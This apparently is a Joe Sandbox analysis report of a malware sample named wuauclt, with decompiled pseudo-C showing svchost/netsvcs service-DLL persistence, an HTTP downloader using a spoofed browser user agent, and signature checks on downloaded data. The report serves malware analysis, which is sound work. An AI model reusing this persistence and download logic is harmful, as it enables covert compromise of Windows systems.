__dosmaperr 20 API calls 11840->11841 11842 25d230 11841->11842 11843 25ba52 __cftof 26 API calls 11842->11843 11844 25d23b 11843->11844 11844->11832 11845 25e04e 46 API calls 11845->11846 11846->11844 11846->11845 11848 255a82 RegQueryValueExA 11847->11848 11849 255a7c 11847->11849 11848->11849 11850 255aae ___scrt_fastfail 11848->11850 11849->11249 11850->11849 11851 255aca RegQueryValueExA 11850->11851 11851->11849 
11852 255aea 11851->11852 11852->11849 11853 255af1 RegCloseKey 11852->11853 11853->11249 11863 2551b6 ___scrt_fastfail 11854->11863 11855 2558a9 11857 257097 TranslatorGuardHandler 5 API calls 11855->11857 11858 2558c3 11857->11858 11858->11254 11858->11255 11859 254cf0 26 API calls 11859->11863 11860 255110 38 API calls 11860->11863 11861 254e30 27 API calls 11861->11863 11862 257f02 38 API calls 11862->11863 11863->11855 11863->11859 11863->11860 11863->11861 11863->11862 11864 253d30 50 API calls 11863->11864 11870 25560c GetSystemDirectoryA 11863->11870 11871 253d30 50 API calls 11863->11871 11872 2557ed DeleteFileA CreateFileA 11863->11872 11880 254a10 11863->11880 11865 255584 OpenSCManagerA 11864->11865 11865->11863 11866 255599 OpenServiceA 11865->11866 11867 2555af CloseServiceHandle 11866->11867 11868 2555b8 QueryServiceStatusEx CloseServiceHandle CloseServiceHandle 11866->11868 11867->11863 11868->11863 11869 2555e6 11868->11869 11869->11863 11870->11863 11871->11863 11873 255821 11872->11873 11874 25580f CloseHandle 11872->11874 11875 253d30 50 API calls 11873->11875 11874->11863 11876 255839 RegCreateKeyExA 11875->11876 11876->11855 11877 25587f RegSetValueExA 11876->11877 11878 2558c7 RegCloseKey 11877->11878 11879 2558a3 RegCloseKey 11877->11879 11878->11855 11879->11855 11894 254e30 11880->11894 11882 254a5b 11906 257f02 11882->11906 11896 254e3e 11894->11896 11895 254e85 11897 254e8e 11895->11897 11898 254f09 11895->11898 11896->11895 11901 254e62 11896->11901 11903 254e9d 11897->11903 11914 254f20 11897->11914 11920 257ec2 11898->11920 11909 254c10 11901->11909 11903->11882 11905 254e80 11905->11882 11970 25d2a1 11906->11970 11908 257f0f 11910 254c29 11909->11910 11912 254c36 11909->11912 11910->11912 11925 254d50 11910->11925 11912->11905 11913 254c84 11913->11905 11915 254f61 11914->11915 11933 2570a8 11915->11933 11918 254fda 11919 255041 11918->11919 11939 254cf0 11918->11939 11919->11903 11960 257de3 11920->11960 11923 2595bc 
__CxxThrowException@8 RaiseException 11924 257ee1 11923->11924 11926 254d96 11925->11926 11927 254d5c 11925->11927 11928 257ec2 27 API calls 11926->11928 11930 254f20 27 API calls 11927->11930 11932 254d77 11927->11932 11929 254da0 11928->11929 11931 254d6a 11930->11931 11931->11913 11932->11913 11934 2570ad new 11933->11934 11935 2570d9 11934->11935 11936 25beae new 7 API calls 11934->11936 11944 2575cf 11934->11944 11948 257ea5 11934->11948 11935->11918 11936->11934 11940 254d2c 11939->11940 11943 254cfe 11939->11943 11955 25ba62 11940->11955 11943->11919 11945 2575dd Concurrency::cancel_current_task 11944->11945 11952 2595bc 11945->11952 11947 2575eb 11947->11934 11949 257eb3 Concurrency::cancel_current_task 11948->11949 11950 2595bc __CxxThrowException@8 RaiseException 11949->11950 11951 257ec1 11950->11951 11953 2595dc 11952->11953 11954 25960e RaiseException 11953->11954 11954->11947 11956 25b9d7 __cftof 26 API calls 11955->11956 11957 25ba71 11956->11957 11958 25ba7f __cftof 11 API calls 11957->11958 11959 25ba7e 11958->11959 11963 257d8b 11960->11963 11966 25953a 11963->11966 11965 257db7 11965->11923 11967 259574 ___std_exception_copy 11966->11967 11968 259547 new 11966->11968 11967->11965 11968->11967 11969 25bab2 ___std_exception_copy 26 API calls 11968->11969 11969->11967 11971 25d2c2 11970->11971 11972 25d2ad 11970->11972 11984 25d8ee 11971->11984 11974 25d495 __dosmaperr 20 API calls 11972->11974 11976 25d2b2 11974->11976 11975 25d2cd 11977 25d2e5 11975->11977 11979 25d495 __dosmaperr 20 API calls 11975->11979 11978 25ba52 __cftof 26 API calls 11976->11978 11977->11908 11980 25d2bd 11978->11980 11981 25d2d6 11979->11981 11980->11908 11982 25d495 __dosmaperr 20 API calls 11981->11982 11983 25d2e1 11982->11983 11983->11908 11985 25d4c2 FindHandlerForForeignException 5 API calls 11984->11985 11986 25d915 11985->11986 11987 25d93f 11986->11987 11989 25d91e 11986->11989 11988 25d37c _abort 38 API calls 11987->11988 11990 25d944 11988->11990 11991 257097 
TranslatorGuardHandler 5 API calls 11989->11991 11990->11975 11992 25d939 11991->11992 11992->11975 12016 2547a0 CreateFileA 11993->12016 11995 2548a7 11995->11277 11996 2549f6 LocalFree 11996->11277 11997 2570a8 new 8 API calls 11998 2548a0 ___scrt_fastfail 11997->11998 11998->11995 11998->11996 11998->11997 11999 254934 LocalAlloc LocalAlloc 11998->11999 12000 254921 LocalFree 11998->12000 12001 254966 11999->12001 12000->11277 12025 254670 LocalAlloc 12001->12025 12003 254983 12004 254987 LocalAlloc 12003->12004 12007 2549df 12003->12007 12005 2549ad ___scrt_fastfail 12004->12005 12006 2549c1 LocalFree LocalFree 12005->12006 12005->12007 12006->11277 12007->11996 12009 255ce1 ___scrt_fastfail 12008->12009 12010 255d49 LocalFree 12009->12010 12013 255d68 12009->12013 12011 257097 TranslatorGuardHandler 5 API calls 12010->12011 12012 255d5f 12011->12012 12012->11280 12014 257097 TranslatorGuardHandler 5 API calls 12013->12014 12015 255d8e 12014->12015 12015->11280 12017 2547d1 GetFileSizeEx LocalAlloc 12016->12017 12018 2547ca 12016->12018 12019 254803 CloseHandle 12017->12019 12020 254812 12017->12020 12018->11998 12019->11998 12021 254822 ReadFile 12020->12021 12022 25484b 12020->12022 12021->12020 12021->12022 12023 254854 CloseHandle LocalFree 12022->12023 12024 25486d FindCloseChangeNotification 12022->12024 12023->11998 12024->11998 12026 2546bf 12025->12026 12029 2546e0 CryptAcquireContextA 12026->12029 12028 2546cc LocalFree 12028->12003 12030 254705 CryptImportKey 12029->12030 12031 2546ff 12029->12031 12030->12031 12032 254724 CryptCreateHash 12030->12032 12031->12028 12032->12031 12033 25473e CryptHashData 12032->12033 12033->12031 12034 254753 CryptVerifySignatureA 12033->12034 12035 254787 12034->12035 12036 254780 CryptDestroyHash 12034->12036 12037 254797 12035->12037 12038 25478e CryptReleaseContext 12035->12038 12036->12035 12037->12028 12038->12037 12040 256ede RegQueryValueExA RegCloseKey SetLastError 12039->12040 12052 257012 12039->12052 12042 

                                                Control-flow Graph

                                                C-Code - Quality: 67%
                                                			E00256CF0(void* __ebx, intOrPtr* __ecx, intOrPtr __edx, void* __edi) {
                                                				signed int _v8;
                                                				signed int _v12;
                                                				char _v60;
                                                				char _v1036;
                                                				char _v2060;
                                                				void* _v2064;
                                                				char* _v2068;
                                                				CHAR* _v2072;
                                                				CHAR* _v2076;
                                                				int _v2080;
                                                				int _v2084;
                                                				char _v2108;
                                                				void* _v2112;
                                                				int _v2116;
                                                				int _v2120;
                                                				intOrPtr _v2124;
                                                				signed int _v2136;
                                                				void* _v4188;
                                                				intOrPtr _v4192;
                                                				int _v4196;
                                                				intOrPtr _v4200;
                                                				void* __esi;
                                                				signed int _t60;
                                                				long _t65;
                                                				long _t69;
                                                				char _t70;
                                                				void* _t73;
                                                				signed int _t75;
                                                				signed int _t80;
                                                				void* _t81;
                                                				char* _t89;
                                                				long _t114;
                                                				char* _t130;
                                                				char* _t134;
                                                				char* _t137;
                                                				intOrPtr _t146;
                                                				void* _t149;
                                                				long _t150;
                                                				void* _t152;
                                                				intOrPtr* _t157;
                                                				void* _t159;
                                                				char* _t160;
                                                				void* _t165;
                                                				void* _t166;
                                                				void* _t167;
                                                				signed int _t168;
                                                				signed int _t169;
                                                				void* _t170;
                                                				signed int _t171;
                                                
                                                				_t149 = __edi;
                                                				_t146 = __edx;
                                                				_t60 =  *0x271004; // 0x80aab37c
                                                				_v8 = _t60 ^ _t168;
                                                				_t157 = __ecx;
                                                				E002596C0(__edi,  &_v2108, 0, 0x800);
                                                				_t171 = _t170 + 0xc;
                                                				_t65 = RegOpenKeyExA(0x80000002, "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Svchost", 0, 0xf003f,  &_v2112); // executed
                                                				if(_t65 == 0) {
                                                					_push(_t149);
                                                					_v2116 = 0x800;
                                                					_t69 = RegQueryValueExA(_v2112, "netsvcs", 0,  &_v2120,  &_v2108,  &_v2116); // executed
                                                					_t150 = _t69;
                                                					SetLastError(_t150);
                                                					__eflags = _t150;
                                                					if(_t150 == 0) {
                                                						_t134 =  &_v60 - _t157;
                                                						__eflags = _t134;
                                                						do {
                                                							_t70 =  *_t157;
                                                							_t157 = _t157 + 1;
                                                							_t134[_t157 - 1] = _t70;
                                                							__eflags = _t70;
                                                						} while (_t70 != 0);
                                                						_t73 = lstrlenA( &_v60) + 1;
                                                						__eflags = _t73 - 0x32;
                                                						if(_t73 >= 0x32) {
                                                							E00257211();
                                                							asm("int3");
                                                							asm("int3");
                                                							asm("int3");
                                                							asm("int3");
                                                							asm("int3");
                                                							asm("int3");
                                                							asm("int3");
                                                							asm("int3");
                                                							asm("int3");
                                                							asm("int3");
                                                							asm("int3");
                                                							asm("int3");
                                                							asm("int3");
                                                							_push(_t168);
                                                							_t169 = _t171;
                                                							_t75 =  *0x271004; // 0x80aab37c
                                                							_v2136 = _t75 ^ _t169;
                                                							_push(_t157);
                                                							_push(lstrlenA);
                                                							_v4192 = _v2124;
                                                							_t152 = 0;
                                                							_t130 = _t134;
                                                							_v4196 = _v2120;
                                                							_v4200 = _t146;
                                                							_v4188 = 0x80000002;
                                                							_t80 = RegOpenKeyExA(0x80000002, "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Svchost", 0, 1,  &_v4188); // executed
                                                							__eflags = _t80;
                                                							if(_t80 != 0) {
                                                								L14:
                                                								_t81 = 0;
                                                								__eflags = 0;
                                                							} else {
                                                								_v2080 = 0x400;
                                                								_t89 = RegQueryValueExA(_v2064, "netsvcs", 0,  &_v2084,  &_v1036,  &_v2080); // executed
                                                								_t160 = _t89; // executed
                                                								RegCloseKey(_v2064); // executed
                                                								SetLastError(_t160);
                                                								__eflags = _t160;
                                                								if(_t160 != 0) {
                                                									goto L14;
                                                								} else {
                                                									_t152 = OpenSCManagerA(_t160, _t160, 0xf003f);
                                                									__eflags = _t152;
                                                									if(_t152 == 0) {
                                                										goto L14;
                                                									} else {
                                                										_t137 = _t130; // executed
                                                										E00256CF0(_t130, _t137, _t146, _t152); // executed
                                                										wsprintfA( &_v2060, "MACHINE\\SYSTEM\\CurrentControlSet\\Services\\%s", _t130);
                                                										_t81 = CreateServiceA(_t152, _t130, _v2068, 0xf01ff, 0x10, 2, 1, "%SystemRoot%\\System32\\svchost.exe -k netsvcs", 0, 0, 0, 0, 0);
                                                										_v2068 = _t81;
                                                										__eflags = _t81;
                                                										if(_t81 != 0) {
                                                											_v2064 = 0x80000002;
                                                											wsprintfA( &_v1036, "SYSTEM\\CurrentControlSet\\Services\\%s", _t130);
                                                											E00256BE0( &_v1036, "Description", 1, _v2072, lstrlenA(_v2072)); // executed
                                                											lstrcatA( &_v1036, "\\Parameters");
                                                											_push(_t137);
                                                											E00256BE0( &_v1036, "ServiceDll", 2, _v2076, lstrlenA(_v2076)); // executed
                                                											_t81 = _v2068;
                                                										}
                                                									}
                                                								}
                                                							}
                                                							CloseServiceHandle(_t81);
                                                							CloseServiceHandle(_t152);
                                                							_pop(_t159);
                                                							__eflags = _v12 ^ _t169;
                                                							return E00257097(_v12 ^ _t169, _t159);
                                                						} else {
                                                							 *((char*)(_t168 + _t73 - 0x38)) = 0;
                                                							E00267820(_t168 + _v2116 - 0x839,  &_v60, lstrlenA( &_v60) + 2);
                                                							_t114 = RegSetValueExA(_v2112, "netsvcs", 0, 7,  &_v2108, lstrlenA( &_v60) + _v2116 + 1); // executed
                                                							RegCloseKey(_v2112); // executed
                                                							SetLastError(_t114);
                                                							_push(lstrlenA( &_v60) + 1);
                                                							lstrcpyA(E002572ED(_t114, __eflags),  &_v60);
                                                							__eflags = _v8 ^ _t168;
                                                							_pop(_t165);
                                                							return E00257097(_v8 ^ _t168, _t165);
                                                						}
                                                					} else {
                                                						RegCloseKey(_v2112);
                                                						_pop(_t166);
                                                						__eflags = _v8 ^ _t168;
                                                						return E00257097(_v8 ^ _t168, _t166);
                                                					}
                                                				} else {
                                                					_pop(_t167);
                                                					return E00257097(_v8 ^ _t168, _t167);
                                                				}
                                                			}
                                                0x00257029
                                                0x00257031
                                                0x00257032
                                                0x0025703d
                                                0x00256dd5
                                                0x00256dd5
                                                0x00256df6
                                                0x00256e24
                                                0x00256e32
                                                0x00256e39
                                                0x00256e46
                                                0x00256e56
                                                0x00256e62
                                                0x00256e64
                                                0x00256e6d
                                                0x00256e6d
                                                0x00256d8f
                                                0x00256d95
                                                0x00256d9e
                                                0x00256da2
                                                0x00256dac
                                                0x00256dac
                                                0x00256d3e
                                                0x00256d40
                                                0x00256d4e
                                                0x00256d4e

                                                APIs
                                                • RegOpenKeyExA.KERNELBASE(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost,00000000,000F003F,?,?,?,00000000), ref: 00256D34
                                                • RegQueryValueExA.KERNELBASE(?,netsvcs,00000000,?,?,?,00000000,?,?,00000000), ref: 00256D7C
                                                • SetLastError.KERNEL32(00000000,?,?,00000000), ref: 00256D85
                                                • RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 00256D95
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.680576375.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                 • Associated: 00000000.00000002.680524455.0000000000250000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.680612634.0000000000269000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.680620343.0000000000271000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.680632582.0000000000274000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_250000_wuauclt.jbxd
                                                Similarity
                                                • API ID: CloseErrorLastOpenQueryValue
                                                • String ID: %SystemRoot%\System32\svchost.exe -k netsvcs$Description$Ik%$MACHINE\SYSTEM\CurrentControlSet\Services\%s$SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost$SYSTEM\CurrentControlSet\Services\%s$ServiceDll$\Parameters$netsvcs
                                                • API String ID: 75635995-3700864189
                                                • Opcode ID: a30e39902998a88a26725e2bbcd65ed5fc3e9b6c3c7898aceb37abab3d35b4ad
                                                • Instruction ID: 5f879bf857f830ab0784b5d8e6a598b7d24b8777651a3963466985fc13e3526b
                                                • Opcode Fuzzy Hash: a30e39902998a88a26725e2bbcd65ed5fc3e9b6c3c7898aceb37abab3d35b4ad
                                                • Instruction Fuzzy Hash: 30816F71A40118ABCB20AB64EC49FEA7BBCFF44711F0084A5FA49A7141DE715E99CF94
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                C-Code - Quality: 94%
                                                			E00256E80(void* __ebx, char* __ecx, CHAR* __edx, void* __edi, void* __esi, char* _a4, CHAR* _a8) {
                                                				signed int _v8;
                                                				char _v1032;
                                                				char _v2056;
                                                				void* _v2060;
                                                				char* _v2064;
                                                				CHAR* _v2068;
                                                				CHAR* _v2072;
                                                				int _v2076;
                                                				int _v2080;
                                                				signed int _t29;
                                                				long _t34;
                                                				void* _t35;
                                                				char* _t43;
                                                				char* _t58;
                                                				char* _t62;
                                                				void* _t67;
                                                				char* _t70;
                                                				signed int _t73;
                                                
                                                				_t63 = __edx;
                                                				_t29 =  *0x271004; // 0x80aab37c
                                                				_v8 = _t29 ^ _t73;
                                                				_v2064 = _a4;
                                                				_t67 = 0;
                                                				_t58 = __ecx;
                                                				_v2068 = _a8;
                                                				_v2072 = __edx;
                                                				_v2060 = 0x80000002;
                                                				_t34 = RegOpenKeyExA(0x80000002, "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Svchost", 0, 1,  &_v2060); // executed
                                                				if(_t34 != 0) {
                                                					L5:
                                                					_t35 = 0;
                                                					L6:
                                                					CloseServiceHandle(_t35);
                                                					CloseServiceHandle(_t67);
                                                					return E00257097(_v8 ^ _t73, CloseServiceHandle);
                                                				}
                                                				_v2076 = 0x400;
                                                				_t43 = RegQueryValueExA(_v2060, "netsvcs", 0,  &_v2080,  &_v1032,  &_v2076); // executed
                                                				_t70 = _t43; // executed
                                                				RegCloseKey(_v2060); // executed
                                                				SetLastError(_t70);
                                                				if(_t70 != 0) {
                                                					goto L5;
                                                				}
                                                				_t67 = OpenSCManagerA(_t70, _t70, 0xf003f);
                                                				if(_t67 == 0) {
                                                					goto L5;
                                                				}
                                                				_t62 = _t58; // executed
                                                				E00256CF0(_t58, _t62, _t63, _t67); // executed
                                                				wsprintfA( &_v2056, "MACHINE\\SYSTEM\\CurrentControlSet\\Services\\%s", _t58);
                                                				_t35 = CreateServiceA(_t67, _t58, _v2064, 0xf01ff, 0x10, 2, 1, "%SystemRoot%\\System32\\svchost.exe -k netsvcs", 0, 0, 0, 0, 0);
                                                				_v2064 = _t35;
                                                				if(_t35 != 0) {
                                                					_v2060 = 0x80000002;
                                                					wsprintfA( &_v1032, "SYSTEM\\CurrentControlSet\\Services\\%s", _t58);
                                                					E00256BE0( &_v1032, "Description", 1, _v2068, lstrlenA(_v2068)); // executed
                                                					lstrcatA( &_v1032, "\\Parameters");
                                                					_push(_t62);
                                                					E00256BE0( &_v1032, "ServiceDll", 2, _v2072, lstrlenA(_v2072)); // executed
                                                					_t35 = _v2064;
                                                				}
                                                				goto L6;
                                                			}






















                                                APIs
                                                • RegOpenKeyExA.KERNELBASE(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost,00000000,00000001,?,00000000,?), ref: 00256ED0
                                                • RegQueryValueExA.KERNELBASE(80000002,netsvcs,00000000,?,?,?), ref: 00256F09
                                                • RegCloseKey.KERNELBASE(80000002), ref: 00256F17
                                                • SetLastError.KERNEL32(00000000), ref: 00256F1E
                                                • OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F), ref: 00256F33
                                                  • Part of subcall function 00256CF0: RegOpenKeyExA.KERNELBASE(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost,00000000,000F003F,?,?,?,00000000), ref: 00256D34
                                                • wsprintfA.USER32 ref: 00256F5D
                                                • CreateServiceA.ADVAPI32(00000000,?,?,000F01FF,00000010,00000002,00000001,%SystemRoot%\System32\svchost.exe -k netsvcs,00000000,00000000,00000000,00000000,00000000), ref: 00256F84
                                                • wsprintfA.USER32 ref: 00256FAF
                                                • lstrlenA.KERNEL32(?,00000000,00000000), ref: 00256FC0
                                                  • Part of subcall function 00256BE0: RegCreateKeyExA.KERNELBASE(80000002,?,00000000,00000000,00000000,000F003F,00000000,002593E0,80AAB37C,80AAB37C,00000000,73B76980,?,002593E0,0026F6D8,000000FE), ref: 00256C35
                                                  • Part of subcall function 00256BE0: RegOpenKeyExA.KERNELBASE(80000002,?,00000000,0002001F,002593E0,?,002593E0,0026F6D8,000000FE,?,00256FDB,Description,00000001,?,00000000), ref: 00256C4B
                                                  • Part of subcall function 00256BE0: RegSetValueExA.ADVAPI32(002593E0,?,00000000,00256FDB,000000FE,00256FDB,?,002593E0,0026F6D8,000000FE,?,00256FDB,Description,00000001,?,00000000), ref: 00256C6F
                                                • lstrcatA.KERNEL32(?,\Parameters), ref: 00256FEA
                                                • lstrlenA.KERNEL32(?), ref: 00256FF7
                                                  • Part of subcall function 00256BE0: RegSetValueExA.KERNELBASE(002593E0,?,00000000,00256FDB,?,?,?,002593E0,0026F6D8,000000FE,?,00256FDB,Description,00000001,?,00000000), ref: 00256CA8
                                                • CloseServiceHandle.ADVAPI32(00000000), ref: 00257026
                                                • CloseServiceHandle.ADVAPI32(00000000), ref: 00257029
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.680576375.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                 • Associated: 00000000.00000002.680524455.0000000000250000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.680612634.0000000000269000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.680620343.0000000000271000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.680632582.0000000000274000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_250000_wuauclt.jbxd
                                                Similarity
                                                • API ID: Open$CloseServiceValue$CreateHandlelstrlenwsprintf$ErrorLastManagerQuerylstrcat
                                                • String ID: %SystemRoot%\System32\svchost.exe -k netsvcs$Description$Ik%$MACHINE\SYSTEM\CurrentControlSet\Services\%s$SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost$SYSTEM\CurrentControlSet\Services\%s$ServiceDll$\Parameters$netsvcs
                                                • API String ID: 3938085191-3700864189
                                                • Opcode ID: c5dce43f108d499a4b1bac0cb207c020d86be0c5343945fd668b2e1f2e32dc50
                                                • Instruction ID: ba7012cb210042400ee556bfe93ae25d55b848ad825a985b5933b3e048158500
                                                • Opcode Fuzzy Hash: c5dce43f108d499a4b1bac0cb207c020d86be0c5343945fd668b2e1f2e32dc50
                                                • Instruction Fuzzy Hash: 63415FB5A5022CABCB209F649C49FDA7BBCFF44711F0080A5FA48A7141DEB15ED98F94
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 219 256450-256472 220 256474-256475 InternetCloseHandle 219->220 221 256477-25647c 219->221 220->221 222 256481-256486 221->222 223 25647e-25647f InternetCloseHandle 221->223 224 256488-256489 InternetCloseHandle 222->224 225 25648b-2564cc InternetOpenA 222->225 223->222 224->225 226 2564e3-256507 InternetConnectA 225->226 227 2564ce-2564e0 call 257097 225->227 226->227 228 256509-25652a HttpOpenRequestA 226->228 228->227 231 25652c-256533 228->231 232 256535-256545 InternetSetOptionA 231->232 233 25654b-25655e HttpSendRequestA 231->233 232->233 233->227 234 256564-25656b 233->234 235 2565a3 234->235 236 25656d-256572 234->236 238 2565a9-2565f6 HttpQueryInfoA call 25be70 call 256410 235->238 237 256575-256577 236->237 239 25659f-2565a1 237->239 240 256579-256581 237->240 245 2565fb-25660d call 257097 238->245 239->238 240->239 242 256583-25659d InternetReadFile 240->242 242->237 242->239
                                                C-Code - Quality: 89%
                                                			E00256450(void* __ebx, void** __ecx, void* __edi, void** _a8) {
                                                				signed int _v8;
                                                				char _v9;
                                                				short _v11;
                                                				DWORD* _v15;
                                                				void _v40;
                                                				long _v44;
                                                				long _v48;
                                                				void* __esi;
                                                				signed int _t34;
                                                				void* _t36;
                                                				void* _t37;
                                                				void* _t38;
                                                				void* _t40;
                                                				void* _t43;
                                                				void* _t47;
                                                				void* _t53;
                                                				int _t59;
                                                				void** _t65;
                                                				void* _t67;
                                                				void* _t68;
                                                				void** _t75;
                                                				long _t78;
                                                				void* _t80;
                                                				signed int _t81;
                                                
                                                				_t34 =  *0x271004; // 0x80aab37c
                                                				_v8 = _t34 ^ _t81;
                                                				_t65 = _a8;
                                                				_t75 = __ecx;
                                                				_t36 =  *__ecx;
                                                				if(_t36 != 0) {
                                                					InternetCloseHandle(_t36);
                                                				}
                                                				_t37 = _t75[1];
                                                				if(_t37 != 0) {
                                                					InternetCloseHandle(_t37);
                                                				}
                                                				_t38 = _t75[2];
                                                				if(_t38 != 0) {
                                                					InternetCloseHandle(_t38);
                                                				}
                                                				 *_t75 = 0;
                                                				_t75[1] = 0;
                                                				_t78 =  !=  ? 0x84a03300 : 0x84200200;
                                                				_t75[2] = 0;
                                                				_t40 = InternetOpenA("Mozilla/4.0 (compatible; MSIE 6.1; Windows NT)", 0, 0, 0, 0); // executed
                                                				_t67 = _t40;
                                                				 *_t75 = _t67;
                                                				if(_t67 != 0) {
                                                					_t43 = InternetConnectA(_t67,  &(_t75[3]), _t75[0x23] & 0x0000ffff, 0, 0, 3, 0, 0); // executed
                                                					_t68 = _t43;
                                                					_t75[1] = _t68;
                                                					if(_t68 == 0) {
                                                						goto L7;
                                                					} else {
                                                						_t47 = HttpOpenRequestA(_t68, "GET",  &(_t75[0x24]), 0, 0, 0, _t78, 0); // executed
                                                						_t75[2] = _t47;
                                                						if(_t47 == 0) {
                                                							goto L7;
                                                						} else {
                                                							if(_t75[0x64] != 0) {
                                                								_t68 =  &_v44;
                                                								_v44 = 0x3380;
                                                								InternetSetOptionA(_t47, 0x1f, _t68, 4);
                                                							}
                                                							if(HttpSendRequestA(_t75[2], 0, 0, 0, 0) == 0) {
                                                								goto L7;
                                                							} else {
                                                								if(_t75[0x64] == 0) {
                                                									 *_t65 = 0;
                                                								} else {
                                                									_t80 = 0;
                                                									_t68 = _t68 | 0xffffffff;
                                                									_v44 = _t68;
                                                									while(_t68 != 0) {
                                                										_t20 = _t80 + 0x1000; // 0x1000
                                                										if( *_t65 > _t20) {
                                                											_t59 = InternetReadFile(_t75[2], _t80, 0x1000,  &_v44);
                                                											_t68 = _v44;
                                                											_t80 = _t80 + _t68;
                                                											if(_t59 != 0) {
                                                												continue;
                                                											}
                                                										}
                                                										break;
                                                									}
                                                									 *_t65 = _t80;
                                                								}
                                                								_v40 = 0;
                                                								_v15 = 0;
                                                								asm("xorps xmm0, xmm0");
                                                								_v11 = 0;
                                                								asm("movups [ebp-0x23], xmm0");
                                                								_v9 = 0;
                                                								asm("movq [ebp-0x13], xmm0");
                                                								_v48 = 0x20;
                                                								HttpQueryInfoA(_t75[2], 0x13,  &_v40,  &_v48, 0);
                                                								_t53 = E0025BE70(_t68,  &_v40);
                                                								E00256410(_t75);
                                                								return E00257097(_v8 ^ _t81, _t53);
                                                							}
                                                						}
                                                					}
                                                				} else {
                                                					L7:
                                                					return E00257097(_v8 ^ _t81, _t78);
                                                				}
                                                			}




























                                                APIs
                                                • InternetCloseHandle.WININET(80AAB37C), ref: 00256475
                                                • InternetCloseHandle.WININET(?), ref: 0025647F
                                                • InternetCloseHandle.WININET(?), ref: 00256489
                                                • InternetOpenA.WININET(Mozilla/4.0 (compatible; MSIE 6.1; Windows NT),00000000,00000000,00000000,00000000), ref: 002564C0
                                                • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 002564FA
                                                • HttpOpenRequestA.WININET(00000000,GET,?,00000000,00000000,00000000,84200200,00000000), ref: 0025651F
                                                • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00256545
                                                • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00256556
                                                • InternetReadFile.WININET(00000000,00000000,00001000,?), ref: 00256590
                                                • HttpQueryInfoA.WININET(00000000,00000013,00000000,?,00000000), ref: 002565E0
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.680576375.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                • Associated: 00000000.00000002.680524455.0000000000250000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.680612634.0000000000269000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.680620343.0000000000271000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.680632582.0000000000274000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_250000_wuauclt.jbxd
                                                Similarity
                                                • API ID: Internet$CloseHandleHttp$OpenRequest$ConnectFileInfoOptionQueryReadSend
                                                • String ID: $GET$Mozilla/4.0 (compatible; MSIE 6.1; Windows NT)
                                                • API String ID: 267240362-3267693786
                                                • Opcode ID: b1aeac19f4c591d75fd911a842f7984cbf421cabbaa582be769f5e6f15209942
                                                • Instruction ID: ac7f40be09bc8c605512e04644f01b8652e247207d6390972ee0ecce2b305999
                                                • Opcode Fuzzy Hash: b1aeac19f4c591d75fd911a842f7984cbf421cabbaa582be769f5e6f15209942
                                                • Instruction Fuzzy Hash: 5E51B770B50306BBEB248F64DC49FA9B7E8AF09711F504159FD04E72C0DBB0A968CBA4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 313 2546e0-2546fd CryptAcquireContextA 314 254705-254722 CryptImportKey 313->314 315 2546ff-254704 313->315 314->315 316 254724-25473c CryptCreateHash 314->316 316->315 317 25473e-254751 CryptHashData 316->317 317->315 318 254753-25477e CryptVerifySignatureA 317->318 319 254787-25478c 318->319 320 254780-254781 CryptDestroyHash 318->320 321 254797-25479d 319->321 322 25478e-254791 CryptReleaseContext 319->322 320->319 322->321
                                                C-Code - Quality: 28%
                                                			E002546E0(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                                				char _v8;
                                                				long* _v12;
                                                				long* _v16;
                                                				int _t16;
                                                				int _t18;
                                                				char* _t20;
                                                				intOrPtr _t21;
                                                				void* _t24;
                                                				void* _t27;
                                                				long* _t30;
                                                
                                                				_t16 = CryptAcquireContextA( &_v12, 0, 0, 1, 0xf0000000); // executed
                                                				if(_t16 != 0) {
                                                					_t18 = CryptImportKey(_v12, 0x272ba0, 0x94, 0, 0,  &_v16); // executed
                                                					if(_t18 == 0) {
                                                						goto L1;
                                                					} else {
                                                						_t20 =  &_v8;
                                                						__imp__CryptCreateHash(_v12, 0x8003, 0, 0, _t20); // executed
                                                						if(_t20 == 0) {
                                                							goto L1;
